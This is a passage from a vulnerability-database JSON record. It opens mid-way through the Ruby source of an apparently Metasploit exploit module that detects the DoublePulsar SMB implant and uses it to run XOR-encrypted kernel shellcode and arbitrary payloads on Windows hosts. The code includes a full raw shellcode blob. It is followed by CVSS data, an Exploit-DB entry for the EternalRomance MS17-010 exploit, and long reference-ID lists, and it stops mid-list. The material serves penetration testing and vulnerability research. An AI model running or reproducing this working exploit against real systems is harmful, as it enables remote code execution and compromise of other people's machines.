calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "8437845d202b2ebef5be3251e688af41"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "0bafb6325bcaf483a25404f785191cc5"}, {"key": "published", "hash": "0bafb6325bcaf483a25404f785191cc5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "e1c3e280f0f2e9b13489f95ca8e6aeea"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "scheme": null}, {"id": "EDB-ID:43970", "hash": "05b5c1df649bac2daf3cc809a79bf40c45ac84ca1c939a894a45ae0d2d4983a2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)", "description": "Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010). 
CVE-2017-0143,CVE-2017-0146,CVE-2017-0147. R...", "published": "2018-02-05T00:00:00", "modified": "2018-02-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/43970/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "lastseen": "2018-02-05T20:53:32", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010). CVE-2017-0143,CVE-2017-0146,CVE-2017-0147. R...", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-02-05T20:53:32", "references": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", 
"ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", 
"QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2018-02-05T20:53:32", "rev": 2, "value": 8.9, "vector": "NONE"}}, "hash": "18989856c3d339e3fddc25795127351f8deb8b7ac8944a0ac8ed05cb7ca913e8", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "78e989de00446befd491b80d94f241f6", "key": "description"}, {"hash": "2882fa4f749f1c5065df21f921150959", "key": "title"}, {"hash": "eaa4ed87336e2e51d149ce6e262dadbe", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "eaa4ed87336e2e51d149ce6e262dadbe", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "ced5a2b3b6df6c4dae430e5843571b2e", "key": "href"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}, {"hash": "e6f53676ca888a6a837a24417efa2477", "key": "cvelist"}], "history": [], "href": "https://www.exploit-db.com/exploits/43970/", "id": "EDB-ID:43970", "immutableFields": [], "lastseen": "2018-02-05T20:53:32", "modified": "2018-02-05T00:00:00", "objectVersion": "1.5", "published": "2018-02-05T00:00:00", "references": [], "reporter": "Exploit-DB", "title": "Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote 
Code Execution (Metasploit) (MS17-010)", "type": "exploitdb", "viewCount": 234}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2018-02-05T20:53:32"}], "viewCount": 236, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96703", "SMNTC-96709"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "mscve", "idList": 